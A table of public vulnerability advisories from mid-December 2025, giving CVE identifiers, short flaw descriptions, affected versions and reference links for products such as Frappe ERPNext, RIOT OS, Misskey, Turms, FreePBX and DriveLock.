| merkulove--Laser | Missing Authorization vulnerability in merkulove Laser laser allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Laser: from n/a through <= 1.1.1. | 2025-12-16 | not yet calculated | CVE-2025-66164 | https://vdp.patchstack.com/database/Wordpress/Plugin/laser/vulnerability/wordpress-laser-plugin-1-1-1-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Lottier for WPBakery | Missing Authorization vulnerability in merkulove Lottier for WPBakery lottier-wpbakery allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Lottier for WPBakery: from n/a through <= 1.1.7. | 2025-12-16 | not yet calculated | CVE-2025-66165 | https://vdp.patchstack.com/database/Wordpress/Plugin/lottier-wpbakery/vulnerability/wordpress-lottier-for-wpbakery-plugin-1-1-7-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Lottier for Elementor | Missing Authorization vulnerability in merkulove Lottier for Elementor lottier-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Lottier for Elementor: from n/a through <= 1.0.9. | 2025-12-16 | not yet calculated | CVE-2025-66166 | https://vdp.patchstack.com/database/Wordpress/Plugin/lottier-elementor/vulnerability/wordpress-lottier-for-elementor-plugin-1-0-9-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Lottier | Missing Authorization vulnerability in merkulove Lottier lottier-gutenberg allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Lottier: from n/a through <= 1.1.1. | 2025-12-16 | not yet calculated | CVE-2025-66167 | https://vdp.patchstack.com/database/Wordpress/Plugin/lottier-gutenberg/vulnerability/wordpress-lottier-plugin-1-1-1-broken-access-control-vulnerability?_s_id=cve |
| Inaba Denki Sangyo Co., Ltd.--CHOCO TEI WATCHER mini (IB-MCT001) | CHOCO TEI WATCHER mini (IB-MCT001) contains an issue with improper check for unusual or exceptional conditions. When the Video Download feature is in a specific communication state, the product's resources may be consumed abnormally. | 2025-12-16 | not yet calculated | CVE-2025-66357 | https://www.inaba.co.jp/files/chocomini_vulnerability_newly_identified.pdf https://jvn.jp/en/vu/JVNVU92827367/ |
| Apache Software Foundation--Apache Airflow | A vulnerability in Apache Airflow allowed authenticated UI users to view secret values in rendered templates due to secrets not being properly redacted, potentially exposing secrets to users without the appropriate authorization. Users are recommended to upgrade to version 3.1.4, which fixes this issue. | 2025-12-15 | not yet calculated | CVE-2025-66388 | https://github.com/apache/airflow/pull/58772 https://lists.apache.org/thread/mv9hzsx8grjf7gdlkxwppnpbtogtls2g |
| misskey-dev--misskey | Misskey is an open source, federated social media platform. Starting in version 13.0.0-beta.16 and prior to version 2025.12.0, an actor who does not have permission to view favorites or clips can can export the posts and view the contents. Version 2025.12.0 fixes the issue. | 2025-12-15 | not yet calculated | CVE-2025-66402 | https://github.com/misskey-dev/misskey/security/advisories/GHSA-496g-mmpw-j9x3 https://github.com/misskey-dev/misskey/commit/dc77d59f8712d3fe0b73cd4af2035133839cd57b |
| Frappe ERPNext--Frappe ERPNext | An SSTI (Server-Side Template Injection) vulnerability exists in the get_dunning_letter_text method of Frappe ERPNext through 15.89.0. The function renders attacker-controlled Jinja2 templates (body_text) using frappe.render_template() with a user-supplied context (doc). Although Frappe uses a custom SandboxedEnvironment, several dangerous globals such as frappe.db.sql are still available in the execution context via get_safe_globals(). An authenticated attacker with access to configure Dunning Type and its child table Dunning Letter Text can inject arbitrary Jinja expressions, resulting in server-side code execution within a restricted but still unsafe context. This can leak database information. | 2025-12-15 | not yet calculated | CVE-2025-66434 | https://www.notion.so/SSTI-bug-1-239e6086eadc8096bfcfe90551a3a483?source=copy_link https://iamanc.github.io/post/erpnext-ssti-bug-1 |
| Frappe ERPNext--Frappe ERPNext | An SSTI (Server-Side Template Injection) vulnerability exists in the get_contract_template method of Frappe ERPNext through 15.89.0. The function renders attacker-controlled Jinja2 templates (contract_terms) using frappe.render_template() with a user-supplied context (doc). Although Frappe uses a custom SandboxedEnvironment, several dangerous globals such as frappe.db.sql are still available in the execution context via get_safe_globals(). An authenticated attacker with access to create or modify a Contract Template can inject arbitrary Jinja expressions into the contract_terms field, resulting in server-side code execution within a restricted but still unsafe context. This vulnerability can be used to leak database information. | 2025-12-15 | not yet calculated | CVE-2025-66435 | https://www.notion.so/SSTI-bug-2-239e6086eadc80878e8fcc7b6c26a584?source=copy_link https://iamanc.github.io/post/erpnext-ssti-bug-2 |
| Frappe ERPNext--Frappe ERPNext | An SSTI (Server-Side Template Injection) vulnerability exists in the get_terms_and_conditions method of Frappe ERPNext through 15.89.0. The function renders attacker-controlled Jinja2 templates (terms) using frappe.render_template() with a user-supplied context (doc). Although Frappe uses a custom SandboxedEnvironment, several dangerous globals such as frappe.db.sql are still available in the execution context via get_safe_globals(). An authenticated attacker with access to create or modify a Terms and Conditions document can inject arbitrary Jinja expressions into the terms field, resulting in server-side code execution within a restricted but still unsafe context. This vulnerability can be used to leak database information. | 2025-12-15 | not yet calculated | CVE-2025-66436 | https://www.notion.so/SSTI-bug-3-239e6086eadc8020aeecdaf123e32f3d?source=copy_link https://iamanc.github.io/post/erpnext-ssti-bug-3 |
| Frappe ERPNext--Frappe ERPNext | An SSTI (Server-Side Template Injection) vulnerability exists in the get_address_display method of Frappe ERPNext through 15.89.0. This function renders address templates using frappe.render_template() with a context derived from the address_dict parameter, which can be either a dictionary or a string referencing an Address document. Although ERPNext uses a custom Jinja2 SandboxedEnvironment, dangerous functions like frappe.db.sql remain accessible via get_safe_globals(). An authenticated attacker with permission to create or modify an Address Template can inject arbitrary Jinja expressions into the template field. By creating an Address document with a matching country, and then calling the get_address_display API with address_dict="address_name", the system will render the malicious template using attacker-controlled data. This leads to server-side code execution or database information disclosure. | 2025-12-15 | not yet calculated | CVE-2025-66437 | https://www.notion.so/SSTI-bug-4-239e6086eadc80aa9331fba874c674a5?source=copy_link https://iamanc.github.io/post/erpnext-ssti-bug-4 |
| Frappe ERPNext--Frappe ERPNext | A Server-Side Template Injection (SSTI) vulnerability exists in the Frappe ERPNext through 15.89.0 Print Format rendering mechanism. Specifically, the API frappe.www.printview.get_html_and_style() triggers the rendering of the html field inside a Print Format document using frappe.render_template(template, doc) via the get_rendered_template() call chain. Although ERPNext wraps Jinja2 in a SandboxedEnvironment, it exposes sensitive functions such as frappe.db.sql through get_safe_globals(). An authenticated attacker with permission to create or modify a Print Format can inject arbitrary Jinja expressions into the html field. Once the malicious Print Format is saved, the attacker can call get_html_and_style() with a target document (e.g., Supplier or Sales Invoice) to trigger the render process. This leads to information disclosure from the database, such as database version, schema details, or sensitive values, depending on the injected payload. Exploitation flow: Create a Print Format with SSTI payload in the html field; call the get_html_and_style() API; triggers frappe.render_template(template, doc) inside get_rendered_template(); leaks database information via frappe.db.sql or other exposed globals. | 2025-12-15 | not yet calculated | CVE-2025-66438 | https://www.notion.so/SSTI-bug-5-239e6086eadc80a48f17c1257a604d2c?source=copy_link https://iamanc.github.io/post/erpnext-ssti-bug-5 |
| Frappe ERPNext--Frappe ERPNext | An issue was discovered in Frappe ERPNext through 15.89.0. Function get_outstanding_reference_documents() at erpnext.accounts.doctype.payment_entry.payment_entry.py is vulnerable to SQL Injection. It allows an attacker to extract arbitrary data from the database by injecting SQL payloads via the from_posting_date parameter, which is directly interpolated into the query without proper sanitization or parameter binding. | 2025-12-15 | not yet calculated | CVE-2025-66439 | https://github.com/frappe/frappe/security https://iamanc.github.io/post/erpnext-sqli |
| Frappe ERPNext--Frappe ERPNext | An issue was discovered in Frappe ERPNext through 15.89.0. Function get_outstanding_reference_documents() at erpnext/accounts/doctype/payment_entry/payment_entry.py is vulnerable to SQL Injection. It allows an attacker to extract arbitrary data from the database by injecting SQL payloads via the to_posting_date parameter, which is directly interpolated into the query without proper sanitization or parameter binding. | 2025-12-15 | not yet calculated | CVE-2025-66440 | https://github.com/frappe/frappe/security https://iamanc.github.io/post/erpnext-sqli |
| misskey-dev--misskey | Misskey is an open source, federated social media platform. Attackers who use an untrusted reverse proxy or not using a reverse proxy at all can bypass IP rate limiting by adding a forged X-Forwarded-For header. Starting with version 2025.9.1, an option (`trustProxy`) has been added in config file to prevent this from happening. However, it is initialized with an insecure default value before version 2025.12.0-alpha.2, making it still vulnerable if the configuration is not set correctly. This is patched in v2025.12.0-alpha.2 by flipping default value of `trustProxy` to `false`. Users of a trusted reverse proxy who are unsure if they manually overode this value should check their config for optimal behavior. Users are running Misskey with a trusted reverse proxy should not be affected by this vulnerability. From v2025.9.1 to v2025.11.1, workaround is available. Set `trustProxy: false` in config file. | 2025-12-15 | not yet calculated | CVE-2025-66482 | https://github.com/misskey-dev/misskey/security/advisories/GHSA-wwrj-3hvj-prpm https://github.com/misskey-dev/misskey/commit/5512898463fa8487b9e6488912f35102b91f25f7 |
| Apache Software Foundation--Apache NiFi | Apache NiFi 1.20.0 through 2.6.0 include the GetAsanaObject Processor, which requires integration with a configurable Distribute Map Cache Client Service for storing and retrieving state information. The GetAsanaObject Processor used generic Java Object serialization and deserialization without filtering. Unfiltered Java object deserialization does not provide protection against crafted state information stored in the cache server configured for GetAsanaObject. Exploitation requires an Apache NiFi system running with the GetAsanaObject Processor, and direct access to the configured cache server. Upgrading to Apache NiFi 2.7.0 is the recommended mitigation, which replaces Java Object serialization with JSON serialization. Removing the GetAsanaObject Processor located in the nifi-asana-processors-nar bundle also prevents exploitation. | 2025-12-19 | not yet calculated | CVE-2025-66524 | https://lists.apache.org/thread/k9h004ydjg7opdvxr0nfywtzf33z60d7 |
| SEIKO EPSON CORPORATION--Web Config | Stack-based buffer overflow vulnerability exists in SEIKO EPSON Web Config. Specially crafted data input by a logged-in user may execute arbitrary code. As for the details of the affected products and versions, see the information provided by the vendor under [References]. | 2025-12-16 | not yet calculated | CVE-2025-66635 | https://www.epson.jp/support/misc_t/251216_oshirase.htm https://epson.com/Support/wa00971 https://jvn.jp/en/jp/JVN51846148/ |
| RIOT-OS--RIOT | RIOT is an open-source microcontroller operating system, designed to match the requirements of Internet of Things (IoT) devices and other embedded devices. A vulnerability was discovered in the IPv6 fragmentation reassembly implementation of RIOT OS v2025.07. When receiving an fragmented IPv6 packet with fragment offset 0 and an empty payload, the payload pointer is set to NULL. However, the implementation still tries to copy the payload into the reassembly buffer, resulting in a NULL pointer dereference which crashes the OS (DoS). To trigger the vulnerability, the `gnrc_ipv6_ext_frag` module must be enabled and the attacker must be able to send arbitrary IPv6 packets to the victim. RIOT OS v2025.10 fixes the issue. | 2025-12-17 | not yet calculated | CVE-2025-66646 | https://github.com/RIOT-OS/RIOT/security/advisories/GHSA-v8gx-q9m6-5xm9 https://github.com/RIOT-OS/RIOT/blob/eb65305cf9f1b7affb50b17af5c12341b83a8636/sys/net/gnrc/network_layer/ipv6/ext/frag/gnrc_ipv6_ext_frag.c#L411 https://github.com/RIOT-OS/RIOT/blob/eb65305cf9f1b7affb50b17af5c12341b83a8636/sys/net/gnrc/network_layer/ipv6/ext/frag/gnrc_ipv6_ext_frag.c#L420 https://github.com/RIOT-OS/RIOT/blob/eb65305cf9f1b7affb50b17af5c12341b83a8636/sys/net/gnrc/network_layer/ipv6/ext/frag/gnrc_ipv6_ext_frag.c#L490 https://github.com/RIOT-OS/RIOT/blob/eb65305cf9f1b7affb50b17af5c12341b83a8636/sys/net/gnrc/network_layer/ipv6/ext/frag/gnrc_ipv6_ext_frag.c#L532 https://github.com/RIOT-OS/RIOT/blob/eb65305cf9f1b7affb50b17af5c12341b83a8636/sys/net/gnrc/network_layer/ipv6/ext/frag/gnrc_ipv6_ext_frag.c#L534 https://github.com/RIOT-OS/RIOT/blob/eb65305cf9f1b7affb50b17af5c12341b83a8636/sys/net/gnrc/network_layer/ipv6/ext/frag/gnrc_ipv6_ext_frag.c#L544 https://github.com/RIOT-OS/RIOT/blob/eb65305cf9f1b7affb50b17af5c12341b83a8636/sys/net/gnrc/pktbuf_static/gnrc_pktbuf_static.c#L150C1-L150C76 https://github.com/RIOT-OS/RIOT/releases/tag/2025.10 https://github.com/user-attachments/files/23903992/reproducer_1.zip |
| RIOT-OS--RIOT | RIOT is an open-source microcontroller operating system, designed to match the requirements of Internet of Things (IoT) devices and other embedded devices. A vulnerability was discovered in the IPv6 fragmentation reassembly implementation of RIOT OS v2025.07. When copying the contents of the first fragment (offset=0) into the reassembly buffer, no size check is performed. It is possible to force the creation of a small reassembly buffer by first sending a shorter fragment (also with offset=0). Overflowing the reassembly buffer corrupts the state of other packet buffers which an attacker might be able to used to achieve further memory corruption (potentially resulting in remote code execution). To trigger the vulnerability, the `gnrc_ipv6_ext_frag` module must be included and the attacker must be able to send arbitrary IPv6 packets to the victim. Version 2025.10 fixes the issue. | 2025-12-17 | not yet calculated | CVE-2025-66647 | https://github.com/RIOT-OS/RIOT/security/advisories/GHSA-wh3v-q6vr-j79r https://github.com/RIOT-OS/RIOT/blob/eb65305cf9f1b7affb50b17af5c12341b83a8636/sys/net/gnrc/network_layer/ipv6/ext/frag/gnrc_ipv6_ext_frag.c#L411 https://github.com/RIOT-OS/RIOT/blob/eb65305cf9f1b7affb50b17af5c12341b83a8636/sys/net/gnrc/network_layer/ipv6/ext/frag/gnrc_ipv6_ext_frag.c#L481 https://github.com/RIOT-OS/RIOT/blob/eb65305cf9f1b7affb50b17af5c12341b83a8636/sys/net/gnrc/network_layer/ipv6/ext/frag/gnrc_ipv6_ext_frag.c#L532 https://github.com/RIOT-OS/RIOT/blob/eb65305cf9f1b7affb50b17af5c12341b83a8636/sys/net/gnrc/network_layer/ipv6/ext/frag/gnrc_ipv6_ext_frag.c#L544 https://github.com/RIOT-OS/RIOT/releases/tag/2025.10 |
| grav--Java | grav before v1.7.49.5 has a Stored Cross-Site Scripting (Stored XSS) vulnerability in the page editing functionality. An authenticated low-privileged user with permission to edit content can inject malicious JavaScript payloads into editable fields. The payload is stored on the server and later executed when any other user views or edits the affected page. | 2025-12-15 | not yet calculated | CVE-2025-66843 | https://github.com/Yohane-Mashiro/grav_cve/issues/1 |
| grav--Java | In grav <1.7.49.5, a SSRF (Server-Side Request Forgery) vector may be triggered via Twig templates when page content is processed by Twig and the configuration allows undefined PHP functions to be registered | 2025-12-15 | not yet calculated | CVE-2025-66844 | https://github.com/Yohane-Mashiro/grav_cve/issues/2 |
| tkFile--Take Web | The Takes web framework's TkFiles take thru 2.0-SNAPSHOT fails to canonicalize HTTP request paths before resolving them against the filesystem. A remote attacker can include ../ sequences in the request path to escape the configured base directory and read arbitrary files from the host system. | 2025-12-19 | not yet calculated | CVE-2025-66905 | https://github.com/yegor256/takes https://github.com/Xzzz111/public_cve_report/blob/main/CVE-2025-66905_report.md |
| SNAPSHOT--SNAPSHOT | Cross Site Request Forgery (CSRF) vulnerability in Turms Admin API thru v0.10.0-SNAPSHOT allows attackers to gain escalated privileges. | 2025-12-19 | not yet calculated | CVE-2025-66906 | https://github.com/turms-im/turms https://github.com/Xzzz111/public_cve_report/blob/main/CVE-2025-66906_report.md |
| SNAPSHOT--SNAPSHOT | Turms AI-Serving module v0.10.0-SNAPSHOT and earlier contains an improper file type validation vulnerability in the OCR image upload functionality. The OcrController in turms-ai-serving/src/main/java/im/turms/ai/domain/ocr/controller/OcrController.java uses the @FormData(contentType = MediaTypeConst.IMAGE) annotation to restrict uploads to image files, but this constraint is not properly enforced. The system relies solely on client-provided Content-Type headers and file extensions without validating actual file content using magic bytes (file signatures). An attacker can upload arbitrary file types including executables, scripts, HTML, or web shells by setting the Content-Type header to "image/*" or using an image file extension. This bypass enables potential server-side code execution, stored XSS, or information disclosure depending on how uploaded files are processed and served. | 2025-12-19 | not yet calculated | CVE-2025-66908 | https://github.com/turms-im/turms https://github.com/turms-im/turms/blob/develop/turms-ai-serving/src/main/java/im/turms/ai/domain/ocr/controller/OcrController.java https://github.com/Xzzz111/public_cve_report/blob/main/CVE-2025-66908_report.md |
| SNAPSHOT--SNAPSHOT | Turms AI-Serving module v0.10.0-SNAPSHOT and earlier contains an image decompression bomb denial of service vulnerability. The ExtendedOpenCVImage class in ai/djl/opencv/ExtendedOpenCVImage.java loads images using OpenCV's imread() function without validating dimensions or pixel count before decompression. An attacker can upload a specially crafted compressed image file (e.g., PNG) that is small when compressed but expands to gigabytes of memory when loaded. This causes immediate memory exhaustion, OutOfMemoryError, and service crash. No authentication is required if the OCR service is publicly accessible. Multiple requests can completely deny service availability. | 2025-12-19 | not yet calculated | CVE-2025-66909 | https://github.com/turms-im/turms https://github.com/turms-im/turms/blob/develop/turms-ai-serving/src/main/java/ai/djl/opencv/ExtendedOpenCVImage.java#L37 https://github.com/Xzzz111/public_cve_report/blob/main/CVE-2025-66909_report.md |
| SNAPSHOT--SNAPSHOT | Turms Server v0.10.0-SNAPSHOT and earlier contains a plaintext password storage vulnerability in the administrator authentication system. The BaseAdminService class caches administrator passwords in plaintext within AdminInfo objects to optimize authentication performance. Upon successful login, raw passwords are stored unencrypted in memory in the rawPassword field. Attackers with local system access can extract these passwords through memory dumps, heap analysis, or debugger attachment, bypassing bcrypt protection. | 2025-12-19 | not yet calculated | CVE-2025-66910 | https://github.com/turms-im/turms https://github.com/turms-im/turms/blob/develop/turms-server-common/src/main/java/im/turms/server/common/domain/admin/bo/AdminInfo.java#L34 https://github.com/turms-im/turms/blob/develop/turms-server-common/src/main/java/im/turms/server/common/domain/admin/service/BaseAdminService.java#L237 https://github.com/Xzzz111/public_cve_report/blob/main/CVE-2025-66910_report.md |
| SNAPSHOT--SNAPSHOT | Turms IM Server v0.10.0-SNAPSHOT and earlier contains a broken access control vulnerability in the user online status query functionality. The handleQueryUserOnlineStatusesRequest() method in UserServiceController.java allows any authenticated user to query the online status, device information, and login timestamps of arbitrary users without proper authorization checks. | 2025-12-19 | not yet calculated | CVE-2025-66911 | https://github.com/turms-im/turms https://github.com/turms-im/turms/blob/develop/turms-service/src/main/java/im/turms/service/domain/user/access/servicerequest/controller/UserServiceController.java#L239 https://github.com/Xzzz111/public_cve_report/blob/main/CVE-2025-66911_report.md |
| Point of Sale--Open Source | A Cross-site scripting (XSS) vulnerability in Create/Update Item(s) Module in Open Source Point of Sale v3.4.1 allows remote attackers to inject arbitrary web script or HTML via the "name" parameter. | 2025-12-17 | not yet calculated | CVE-2025-66921 | https://github.com/opensourcepos/opensourcepos https://github.com/omkaryepre/vulnerability-research/blob/main/CVE-2025-66921/readme.md |
| Point of Sale--Open Source | A Cross-site scripting (XSS) vulnerability in Create/Update Customer(s) in Open Source Point of Sale v3.4.1 allows remote attackers to inject arbitrary web script or HTML via the phone_number parameter. | 2025-12-17 | not yet calculated | CVE-2025-66923 | https://github.com/opensourcepos/opensourcepos https://github.com/omkaryepre/vulnerability-research/blob/main/CVE-2025-66923/readme.md |
| Point of Sale--Open Source | A Cross-site scripting (XSS) vulnerability in Create/Update Item Kit(s) in Open Source Point of Sale v3.4.1 allows remote attackers to inject arbitrary web script or HTML via the "name" parameter. | 2025-12-17 | not yet calculated | CVE-2025-66924 | https://github.com/opensourcepos/opensourcepos https://github.com/omkaryepre/vulnerability-research/blob/main/CVE-2025-66924/readme.md |
| Power Contril--Uplink | CSRF vulnerability in narda miteq Uplink Power Contril Unit UPC2 v.1.17 allows a remote attacker to execute arbitrary code via the Web-based management interface and specifically the /system_setup.htm, /set_clock.htm, /receiver_setup.htm, /cal.htm?..., and /channel_setup.htm endpoints | 2025-12-17 | not yet calculated | CVE-2025-66953 | https://www.nardamiteq.com/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-66953%20_%20narda%20miteq%20Uplink%20Power%20Contril%20Unitl%20UPC2%20_%20CSRF |
| Hitron--Hitron | An issue in Hitron HI3120 v.7.2.4.5.2b1 allows a local attacker to obtain sensitive information via the Logout option in the index.html | 2025-12-15 | not yet calculated | CVE-2025-66963 | http://hitron.com https://github.com/kakarotossj3/CVEs/blob/main/Hitron/Insufficient%20Session%20Expiration/Details |
| Tenda--Tenda | A Buffer overflow vulnerability in function fromAdvSetMacMtuWan of bin httpd in Tenda AC10V4.0 V16.03.10.20 allows remote attackers to cause denial of service and possibly code execution by sending a post request with a crafted payload (field `serviceName`) to /goform/AdvSetMacMtuWan. | 2025-12-17 | not yet calculated | CVE-2025-67073 | https://github.com/johnathanhuutri/CVEReport/tree/master/CVE-2025-67073 |
| Tenda--Tenda | A Buffer overflow vulnerability in function fromAdvSetMacMtuWan of bin httpd in Tenda AC10V4.0 V16.03.10.20 allows remote attackers to cause denial of service and possibly code execution by sending a post request with a crafted payload (field `serverName`) to /goform/AdvSetMacMtuWan. | 2025-12-17 | not yet calculated | CVE-2025-67074 | https://github.com/johnathanhuutri/CVEReport/tree/master/CVE-2025-67074 |
| Simple Machines--Simple Machines | A stored cross-site scripting (XSS) vulnerability in Simple Machines Forum v2.1.6 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Forum Name parameter. | 2025-12-18 | not yet calculated | CVE-2025-67163 | https://github.com/SimpleMachines/SMF/security/advisories/GHSA-p2xm-x9fp-5r7x https://github.com/SimpleMachines/SMF/blob/release-3.0/Themes/default/Stats.template.php#L26 https://github.com/SimpleMachines/SMF https://wiki.simplemachines.org/smf/Installing https://github.com/mbiesiad/vulnerability-research/tree/main/CVE-2025-67163 |
| Pagekit CMS--Pagekit MS | An authenticated arbitrary file upload vulnerability in the /storage/poc.php component of Pagekit CMS v1.0.18 allows attackers to execute arbitrary code via uploading a crafted PHP file. | 2025-12-17 | not yet calculated | CVE-2025-67164 | https://github.com/mbiesiad/vulnerability-research/tree/main/CVE-2025-67164 |
| Pagekit CMS--Pagekit MS | An Insecure Direct Object Reference (IDOR) in Pagekit CMS v1.0.18 allows attackers to escalate privileges. | 2025-12-17 | not yet calculated | CVE-2025-67165 | https://github.com/pagekit/pagekit https://github.com/pagekit/docs/blob/develop/user-interface/users.md#roles https://github.com/pagekit/docs/blob/develop/user-interface/users.md#permissions https://github.com/mbiesiad/vulnerability-research/tree/main/CVE-2025-67165 |
| RiteCMS--RiteCMS | RiteCMS v3.1.0 was discovered to use insecure encryption to store passwords. | 2025-12-17 | not yet calculated | CVE-2025-67168 | https://github.com/handylulu/RiteCMS https://github.com/handylulu/RiteCMS/blob/master/cms/includes/functions.admin.inc.php https://github.com/mbiesiad/vulnerability-research/tree/main/CVE-2025-67168 |
| RiteCMS--RiteCMS | A reflected cross-site scripting (XSS) vulnerability in RiteCMS v3.1.0 allows attackers to execute arbitrary code in the context of a user's browser via a crafted payload. | 2025-12-17 | not yet calculated | CVE-2025-67170 | https://github.com/handylulu/RiteCMS/ https://github.com/mbiesiad/vulnerability-research/tree/main/CVE-2025-67170 |
| RiteCMS--RiteCMS | Incorrect access control in the /templates/ component of RiteCMS v3.1.0 allows attackers to access sensitive files via directory traversal. | 2025-12-17 | not yet calculated | CVE-2025-67171 | https://github.com/handylulu/RiteCMS/ https://github.com/mbiesiad/vulnerability-research/tree/main/CVE-2025-67171 |
| RiteCMS--RiteCMS | RiteCMS v3.1.0 was discovered to contain an authenticated remote code execution (RCE) vulnerability via the parse_special_tags() function. | 2025-12-17 | not yet calculated | CVE-2025-67172 | https://github.com/handylulu/RiteCMS/ https://github.com/handylulu/RiteCMS/blob/master/cms/includes/functions.inc.php#L297 https://github.com/handylulu/RiteCMS/blob/master/cms/includes/functions.inc.php#L504 https://github.com/mbiesiad/vulnerability-research/tree/main/CVE-2025-67172 |
| RiteCMS--RiteCMS | A Cross-Site Request Forgery (CSRF) in the page creation/editing function of RiteCMS v3.1.0 allows attackers to arbitrarily create pages via a crafted POST request. | 2025-12-17 | not yet calculated | CVE-2025-67173 | https://github.com/handylulu/RiteCMS/ https://github.com/mbiesiad/vulnerability-research/tree/main/CVE-2025-67173 |
| RiteCMS--RiteCMS | A local file inclusion (LFI) vulnerability in RiteCMS v3.1.0 allows attackers to read arbitrary files on the host via a directory traversal in the admin_language_file and default_page_language_file in the admin.php component | 2025-12-17 | not yet calculated | CVE-2025-67174 | https://github.com/handylulu/RiteCMS https://github.com/handylulu/RiteCMS/blob/master/admin.php#L46 https://github.com/handylulu/RiteCMS/blob/master/cms/subtemplates/settings.inc.tpl#L64 https://github.com/mbiesiad/vulnerability-research/tree/main/CVE-2025-67174 |
| QR-Code--QR-Code | A SQL injection vulnerability was found in the '/cts/admin/?page=zone' file of ITSourcecode COVID Tracking System Using QR-Code v1.0. The reason for this issue is that attackers inject malicious code from the parameter 'id' and use it directly in SQL queries without the need for appropriate cleaning or validation. | 2025-12-17 | not yet calculated | CVE-2025-67285 | https://github.com/bardminx/Lonlydance/issues/1 |
| EVE-NG--EVE-NG | EVE-NG 6.4.0-13-PRO is vulnerable to Directory Traversal. The /api/export interface allows authenticated users to export lab files. This interface lacks effective input validation and filtering when processing file path parameters submitted by users. | 2025-12-19 | not yet calculated | CVE-2025-67442 | https://github.com/XunMInt/cve/blob/main/EVE-NG_20251207.md |
| weDevs--WP ERP | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in weDevs WP ERP erp allows Retrieve Embedded Sensitive Data.This issue affects WP ERP: from n/a through <= 1.16.6. | 2025-12-18 | not yet calculated | CVE-2025-67546 | https://vdp.patchstack.com/database/Wordpress/Plugin/erp/vulnerability/wordpress-wp-erp-plugin-1-16-6-sensitive-data-exposure-vulnerability?_s_id=cve |
| FreePBX--security-reporting | FreePBX is an open-source web-based graphical user interface (GUI) that manages Asterisk. Prior to versions 16.0.45 and 17.0.24 of the FreePBX framework, an authenticated local privilege escalation exists in the deprecated FreePBX startup script `amportal`. In the deprecated `amportal` utility, the lookup for the `freepbx_engine` file occurs in `/etc/asterisk/` directories. Typically, these are configured by FreePBX as writable by the **asterisk** user and any members of the **asterisk** group. This means that a member of the **asterisk** group can add their own `freepbx_engine` file in `/etc/asterisk/` and upon `amportal` executing, it would exec that file with root permissions (even though the file was created and placed by a non-root user). Version 16.0.45 and 17.0.24 contain a fix for the issue. Other mitigation strategies are also available. Confirm only trusted local OS system users are members of the `asterisk` group. Look for suspicious files in the `/etc/asterisk/` directory (via Admin -> Config Edit in the GUI, or via CLI). Double-check that `live_dangerously = no` is set (or unconfigured, as the default is **no**) in `/etc/asterisk/asterisk.conf` file. Eliminate any unsafe custom use of Asterisk dial plan applications and functions that potentially can manipulate the file system, e.g., System(), FILE(), etc. | 2025-12-16 | not yet calculated | CVE-2025-67722 | https://github.com/FreePBX/security-reporting/security/advisories/GHSA-p42w-v77m-hfp8 https://www.freepbx.org/watch-what-we-do-with-security-fixes-%f0%9f%91%80 |
| FreePBX--security-reporting | The FreePBX module tts (Text to Speech) for FreePBX, an open-source web-based graphical user interface (GUI) that manages Asterisk. Versions prior to 16.0.5 and 17.0.5 are vulnerable to SQL injection by authenticated users with administrator access. Authenticated users with administrative access to the Administrator Control Panel (ACP) can leverage this SQL injection vulnerability to extract sensitive information from the database and execute code on the system as the `asterisk` user with chained elevation to `root` privileges. Users should upgrade to version 16.0.5 or 17.0.5 to receive a fix. | 2025-12-16 | not yet calculated | CVE-2025-67736 | https://github.com/FreePBX/security-reporting/security/advisories/GHSA-632c-49p9-x7cw https://www.freepbx.org/watch-what-we-do-with-security-fixes-%f0%9f%91%80 |
| trailofbits--fickling | Fickling is a Python pickling decompiler and static analyzer. Versions prior to 0.1.6 are missing `marshal` and `types` from the block list of unsafe module imports. Fickling started blocking both modules to address this issue. This allows an attacker to craft a malicious pickle file that can bypass fickling since it misses detections for `types.FunctionType` and `marshal.loads`. A user who deserializes such a file, believing it to be safe, would inadvertently execute arbitrary code on their system. This impacts any user or system that uses Fickling to vet pickle files for security issues. The issue was fixed in version 0.1.6. | 2025-12-16 | not yet calculated | CVE-2025-67747 | https://github.com/trailofbits/fickling/security/advisories/GHSA-565g-hwwr-4pp3 https://github.com/trailofbits/fickling/pull/186 https://github.com/trailofbits/fickling/commit/4e34561301bda1450268d1d7b0b2b151de33b913 https://github.com/trailofbits/fickling/releases/tag/v0.1.6 |
| trailofbits--fickling | Fickling is a Python pickling decompiler and static analyzer. Versions prior to 0.1.6 had a bypass caused by `pty` missing from the block list of unsafe module imports. This led to unsafe pickles based on `pty.spawn()` being incorrectly flagged as `LIKELY_SAFE`, and was fixed in version 0.1.6. This impacted any user or system that used Fickling to vet pickle files for security issues. | 2025-12-16 | not yet calculated | CVE-2025-67748 | https://github.com/trailofbits/fickling/security/advisories/GHSA-r7v6-mfhq-g3m2 https://github.com/trailofbits/fickling/pull/108 https://github.com/trailofbits/fickling/pull/187 |
| DriveLock--DriveLock | An issue was discovered in DriveLock 24.1 before 24.1.6, 24.2 before 24.2.7, and 25.1 before 25.1.5. Local unprivileged users can manipulate privileged processes to gain more privileges on Windows computers. | 2025-12-17 | not yet calculated | CVE-2025-67781 | https://drivelock.help/en-us/Content/Home.htm |
| DriveLock--DriveLock | An issue was discovered in 25.1.2 before 25.1.5. A Cross Site Scripting (XSS) issue in DriveLock Operations Center allows for session takeover over a network. | 2025-12-17 | not yet calculated | CVE-2025-67787 | https://drivelock.help/versions/current/web/en/releasenotes/Content/ReleaseNotes_DriveLock/SecurityBulletins/25-002-CrossSiteScripting.htm |
| DriveLock--DriveLock | An issue was discovered in DriveLock 24.1 before 24.1.6, 24.2 before 24.2.7, and 25.1 before 25.1.5. Authenticated users can retrieve the computer count of other DriveLock tenants via the DriveLock API. | 2025-12-17 | not yet calculated | CVE-2025-67789 | https://drivelock.help/versions/current/web/en/releasenotes/Content/ReleaseNotes_DriveLock/SecurityBulletins/25-004-DESInfoDisclosure.htm |
